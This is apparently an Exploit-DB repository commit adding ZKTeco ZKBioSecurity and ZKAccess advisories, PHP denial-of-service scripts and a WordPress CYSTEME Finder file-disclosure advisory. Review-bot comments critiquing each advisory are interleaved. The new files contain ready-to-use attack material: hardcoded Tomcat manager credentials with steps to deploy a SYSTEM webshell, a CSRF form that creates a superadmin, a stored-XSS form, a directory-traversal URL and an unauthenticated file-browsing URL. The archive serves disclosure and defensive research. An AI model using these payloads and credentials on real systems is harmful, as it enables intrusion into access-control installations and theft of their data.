DB: 2016-09-01

15 new exploits

WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload
PHP 5.0.0 - snmpwalkoid() Local Denial of Service
PHP 5.0.0 - fbird_[p]connect() Local Denial of Service
PHP 5.0.0 - snmpwalk() Local Denial of Service
PHP 5.0.0 - snmprealwalk() Local Denial of Service
PHP 5.0.0 - snmpset() Local Denial of Service
PHP 7.0 - AppendIterator::append Local Denial of Service
ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation
ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation
ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution
ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery
ZKTeco ZKBioSecurity 3.0 - Directory Traversal
ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass
ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting
PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service
Offensive Security 2016-09-01 05:08:40 +00:00
parent 1f0c845486
commit 3a2154afbd
35 changed files with 779 additions and 19 deletions

@ -36439,8 +36439,23 @@ id,file,description,date,author,platform,type,port
40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80
40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0
40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0
40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
40314,platforms/php/dos/40314.php,"PHP 5.0.0 - hw_docbyanchor() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
40315,platforms/php/dos/40315.php,"PHP 5.0.0 - html_doc_file() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
40316,platforms/php/dos/40316.php,"PHP 5.0.0 - snmpwalkoid() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40317,platforms/php/dos/40317.php,"PHP 5.0.0 - fbird_[p]connect() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40318,platforms/php/dos/40318.php,"PHP 5.0.0 - snmpwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40319,platforms/php/dos/40319.php,"PHP 5.0.0 - snmprealwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40320,platforms/php/dos/40320.php,"PHP 5.0.0 - snmpset() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40321,platforms/php/dos/40321.php,"PHP 7.0 - AppendIterator::append Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40322,platforms/windows/local/40322.txt,"ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
40323,platforms/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery",2016-08-31,LiquidWorm,jsp,webapps,8088
40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
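Review bot: the new `40295` row misspells "Disclosure" as "Dislcosure" (the commit message carries the same typo), and the port column is inconsistent for the ZKBioSecurity rows: `40327` is recorded with port `0` while its siblings `40324`, `40325` and `40326`, which target the same Tomcat instance, use `8088`. Suggest fixing the spelling in the row and in the file's own title line, and setting `40327` to `8088` (or stating why it differs) so the port field stays searchable. The rows are also not in id order (`40309` and `40311` precede `40295`); harmless, but worth noting if the CSV is expected to be sorted.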

platforms/jsp/webapps/40324.txt Executable file

@ -0,0 +1,98 @@
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
The application comes bundled with a pre-configured apache tomcat server and an
exposed 'manager' application that after authenticating with the credentials:
username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
malicious WAR archive containing a JSP application to be uploaded, thus giving
the attacker the ability to execute arbitrary code with SYSTEM privileges.
Ref: https://www.exploit-db.com/exploits/31433/
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php
18.07.2016
--
Contents of tomcat-users.xml:
-----------------------------
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:
<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>
</tomcat-users>
-----------------------------
Open Manager application and login:
-----------------------------------
http://127.0.0.1:8088/manager (zkteco:zkt123)
Deploy JSP webshell, issue command:
-----------------------------------
- Request: whoami
- Response: nt authority\system
call the findConnectors() method of the Service use:
----------------------------------------------------
http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
Response:
OK - Operation findConnectors returned:
Connector[HTTP/1.1-8088]
Connector[AJP/1.3-8019]
List of all loaded servlets:
----------------------------
http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet
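Review bot: the advisory reproduces the credentials and the `manager-gui,manager-script,manager-jmx,manager-status` roles from `tomcat-users.xml` but gives no remediation, and the `Ref:` line cites exploit 31433 without saying what it is for. Suggest a short fix section: remove the `zkteco` user (or strip the `manager-*` roles) in `C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml`, undeploy the bundled `manager` webapp if the product does not need it, and restrict access to the `8088` HTTP and `8019` AJP connectors that the `findConnectors` output shows bound. The `jmxproxy` requests at the end only document information disclosure; if they are meant as a second finding (JMX proxy reachable with the same account), say so, otherwise they read as unrelated to the WAR-upload issue. Minor: `Video:2.0.1.0_R_489` is missing the space after the colon in every ZKBioSecurity advisory in this commit.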

@ -0,0 +1,72 @@
<!--
ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
<input type="hidden" name="authUser&#46;username" value="thricer" />
<input type="hidden" name="authUser&#46;loginPwd" value="111111" />
<input type="hidden" name="repassword" value="111111" />
<input type="hidden" name="authUser&#46;isActive" value="true" />
<input type="hidden" name="authUser&#46;isSuperuser" value="true" />
<input type="hidden" name="groupIds" value="1" />
<input type="hidden" name="deptIds" value="1" />
<input type="hidden" name="areaIds" value="1" />
<input type="hidden" name="authUser&#46;email" value="lab@zeroscience.mk" />
<input type="hidden" name="authUser&#46;name" value="test" />
<input type="hidden" name="authUser&#46;lastName" value="lasttest" />
<input type="hidden" name="fingerTemplate" value="&#13;" />
<input type="hidden" name="fingerId" value="&#13;" />
<input type="hidden" name="logMethod" value="add" />
<input type="hidden" name="un" value="1471451964349_2769" />
<input type="hidden" name="systemCode" value="base" />
<input type="submit" value="Go" />
</form>
</body>
</html>
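Review bot: the description claims `authUserAction!edit.action` performs no validity checks, but the form carries a hidden `un` field with the value `1471451964349_2769`, which looks like a timestamp-derived per-request value; the advisory should state explicitly whether the server accepts any (or a stale) `un` value, because a working anti-CSRF token there would invalidate the PoC. It also does not say what privilege the victim needs: the text says "administrative privileges", and the form sets `authUser.isSuperuser` to `true`, so presumably only a superuser session can create another superuser. Remediation is absent: a per-session synchronizer token validated on `logMethod=add`, or rejecting cross-site requests via `Origin`/`Referer` checks, would close this.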

platforms/jsp/webapps/40326.txt Executable file
@ -0,0 +1,53 @@

ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php
18.07.2016
--
http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
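Review bot: the title here says "File Path Manipulation Vulnerability" while the CSV row and the commit message call it "Directory Traversal", and the `Desc:` paragraph is generic text about path manipulation that does not describe this product at all. Replace it with what the single PoC line actually shows: the `xmlPath` parameter of `baseAction!getPageXML.action` is used unsanitised to read files, `/vid/../WEB-INF/web.xml` escapes the `vid` directory, and the advisory should state what the response contains, whether the traversal is confined to the web application root (the paragraph says "may be within or outside the web root" without resolving it), and whether authentication is required. A fix hint (canonicalise the path and verify it stays under the intended XML directory, or map `xmlPath` to a fixed list of page names) would also help.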

platforms/jsp/webapps/40327.txt Executable file
@ -0,0 +1,80 @@
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The issue exist due to the way visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It runs a check
whether the request is coming from the local machine and sets the ip variable
to '127.0.0.1' if equal to 0:0:0:0:0:0:0:1. The ip variable is then used as a
username value with the password '123456' to authenticate and disclose sensitive
information and/or do unauthorized actions.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
18.07.2016
--
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------
1: <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
2: <%@page import="com.zk.common.util.EnvironmentUtil"%>
3: <%
4: String path = request.getContextPath();
5: String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
6:
7: String ip= EnvironmentUtil.getClientIp(request);
8: if("0:0:0:0:0:0:0:1".equals(ip))
9: {
10: ip = "127.0.0.1";
11: }
12:
13: %>
14: <jsp:include page="login.jsp"/>
15: <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>
16:
17: <script>
18: function autoLogin()
19: {
20: $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
21: $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
22: var ip = "<%=ip%>";
23: $("#userLoginForm input[name='username']").val(ip);
24: $("#userLoginForm input[name='password']").val("123456");
25: $('#userLoginForm').submit();
26: }
27: window.onload=autoLogin;
28: </script>
---------------------------------------------------------------------------------
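Review bot: the `Desc:` paragraph presents the IPv6 loopback normalisation at source lines 7-11 as the issue, but the listed code shows the actual weakness at lines 22-24: `visLogin.jsp` fills the login form with the client IP as username and the fixed password `123456` and submits it, so any request the page considers local is logged in as that account. The advisory should say where `EnvironmentUtil.getClientIp(request)` takes the address from, since the "Local" scope in the title depends on whether a proxy-supplied header can influence it, and it should name which account `127.0.0.1` maps to and what that account can do ("disclose sensitive information and/or do unauthorized actions" is too vague to rate). Grammar: "The issue exist" should read "The issue exists". The CSV row for this file also records port `0` while the other ZKBioSecurity entries use `8088`.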

@ -0,0 +1,57 @@
<!--
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252
Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.
Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: CherryPy/3.1.0beta3 WSGI Server
Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
Python 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
<input type="hidden" name="pk" value="None" />
<input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
<input type="hidden" name="holiday&#95;type" value="1" />
<input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
<input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
<input type="hidden" name="loop&#95;by&#95;year" value="2" />
<input type="hidden" name="memo" value=""><script>alert&#40;2&#41;<&#47;script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
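Review bot: `Affected version: 5.3.12252` in the header does not match the `5.3.1` used in the CSV row and the title; one of them should be corrected or the relationship between the two numbers spelled out. The PoC posts to `/data/iaccess/AccHolidays/_new_/?_lock=1` from a cross-origin page, which means the stored XSS is also reachable through CSRF, yet the description only mentions that `holiday_name` and `memo` are returned unsanitised; say whether the request needs a session cookie and where the stored values are rendered back. Remediation is missing: HTML-encode `holiday_name` and `memo` on output (the CherryPy/Python 2.6 stack named under `Tested on` has `cgi.escape` for this) and add CSRF protection to the `_new_` handler.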

platforms/php/dos/40316.php Executable file
@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmpwalkoid() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmpwalkoid('127.0.0.1', 'public', $str);
?>
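Review bot: `Date: 26/08/2016` in the header disagrees with the `2016-08-31` date in the CSV row, and the script never states the expected outcome or which argument matters: a comment on the `snmpwalkoid('127.0.0.1', 'public', $str)` line saying that the 9999-byte string is passed as the object id and that the php process terminates (rather than returning an error) would let a reader confirm the crash. Since the PoC targets `127.0.0.1`, it should also say whether an SNMP agent must be listening or the fault occurs before any packet is sent. The same applies to the `40318.php`, `40319.php` and `40320.php` siblings below.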

platforms/php/dos/40317.php Executable file
@ -0,0 +1,16 @@
<?php
#############################################################################
## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("interbase")) die("You need interbase extension loaded!");
$str = str_repeat('A', 9999);
//fbird_connect($str);
fbird_pconnect($str);
?>
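Review bot: the title covers `fbird_[p]connect()`, but the script only exercises `fbird_pconnect($str)` and leaves `fbird_connect($str)` commented out; either state in a comment that both variants crash on the 9999-byte database string, or name only the one that was verified. As with the other PHP 5.0.0 PoCs in this commit, `Date: 26/08/2016` conflicts with the CSV date `2016-08-31`.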

platforms/php/dos/40318.php Executable file
@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmpwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmpwalk('127.0.0.1', 'public', $str);
?>

platforms/php/dos/40319.php Executable file
@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmprealwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmprealwalk('127.0.0.1', 'public', $str);
?>

platforms/php/dos/40320.php Executable file
@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmpset() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmpset("localhost", 'public', $str, '', '');
?>

platforms/php/dos/40321.php Executable file
@ -0,0 +1,12 @@
<?php
#############################################################################
## PHP 7.0 AppendIterator::append Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$tmp = new AppendIterator();
$tmp->append($tmp); // Crash
?>
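Review bot: `$tmp->append($tmp); // Crash` gives no symptom and no version beyond "PHP 7.0": record the exact 7.0.x build, whether the failure is a segmentation fault or an exhaustion error, and whether running the two lines with `php -r` is enough to reproduce. "Local Denial of Service" here means a script crashing its own interpreter; unless untrusted input can make an application pass an iterator to its own `AppendIterator::append()`, the impact is limited to code that already runs PHP, and the header should say so.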

platforms/php/dos/40329.php Executable file
@ -0,0 +1,17 @@
<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
function jsonSerialize() {
$jsonTmp = new jsonTmp();
return $jsonTmp;
}
}
json_encode(new jsonTmp());
?>
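Review bot: `jsonSerialize()` returns a fresh `jsonTmp` on every call, so `json_encode()` recurses without bound; the PoC should record the observed failure (segmentation fault versus memory or stack exhaustion), the exact PHP 7.0.x build, and whether `json_encode()`'s `$depth` argument (default 512) bounds the recursion through `JsonSerializable` or is bypassed, because that decides whether this is a bug in the depth accounting or an expected consequence of user code. The impact statement mirrors `40321.php`: it requires running attacker-controlled PHP, and "Local Denial of Service" should make that explicit.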

@ -1,4 +1,4 @@
#==================================================================================================
#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#==================================================================================================
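Review bot: this hunk, like the other `@ -1,4 +1,4 @@` hunks below that touch old exploit files, shows the first line twice with no visible textual difference, which usually means a line-ending or byte-order-mark change that the rendered diff cannot display. The commit message only lists the 15 new exploits, so please state that these existing files were re-encoded (and to what); otherwise a reviewer cannot tell a cleanup from an accidental modification of archived exploit code.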

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "X7 Chat <=2.0.4 'old_prefix' blind SQL injection / privilege escalation exploit\r\n";
echo "by rgod rgod@autistici.org\r\n";

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";

@ -1,4 +1,4 @@
########################### www.system-defacers.org ###############
########################### www.system-defacers.org ###############
# Found By CeNGiZ-HaN cengiz-han@system-defacers.org
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################

@ -1,4 +1,4 @@
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+

@ -1,4 +1,4 @@
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+

@ -1,4 +1,4 @@
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+
+ PHPAuction 2.1 Remote File Inclusion
+

@ -1,4 +1,4 @@
#=================================================================
#=================================================================
#Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
#================================================================
# |

@ -1,4 +1,4 @@
TinyPHPForum 3.6 Admin Maker<br>
TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net
<FORM method=post enctype="multipart/form-data">

@ -1,4 +1,4 @@
Script: TSEP <= 0.942
Script: TSEP <= 0.942
URL: www.tsep.info
Discovered: beford <xbefordx gmail com>
Comments: "register_globals" must be enabled duh.

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n";
echo "execution exploit\n";

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
echo "administrative credentials disclosure exploit\n";

@ -1,4 +1,4 @@
SQLiteWebAdmin
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
SQLiteWebAdmin is a simple PHP program for administrating

@ -1,4 +1,4 @@
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/

@ -1,4 +1,4 @@
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)

platforms/php/webapps/40295.txt Executable file
@ -0,0 +1,119 @@
Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
Link: https://wordpress.org/plugins/cysteme-finder/
Version: 1.3
Date: August 23rd 2016
Exploit Author: T0w3ntum
Author Website: t0w3ntum.com
### SUMMARY
CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request
to http://server/wp-content/plugins/cysteme-finder/php/connector.php
This allows attackers to upload, download, and browse the remote file system.
### LFI
- Retrieve all data in the root wordpress directory. This will return JSON.
Exploit:
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1
Reply:
{
"cwd": {
"mime": "directory",
"ts": 1471999484,
"read": 1,
"write": 1,
"size": 0,
"hash": "l1_Lw",
"volumeid": "l1_",
"name": "Fichiers du site",
"date": "Today 20:44",
"locked": 1,
"dirs": 1
},
"options": {
"path": "Fichiers du site",
"url": null,
"tmbUrl": "",
"disabled": [
],
"separator": "\/",
"copyOverwrite": 1,
"archivers": {
"create": [
"application\/x-tar",
"application\/x-gzip",
"application\/x-bzip2"
],
"extract": [
"application\/x-tar",
"application\/x-gzip",
"application\/x-bzip2",
"application\/zip"
]
}
},
"files": [
{
"mime": "directory",
"ts": 1471999484,
"read": 1,
"write": 1,
"size": 0,
"hash": "l1_Lw",
"volumeid": "l1_",
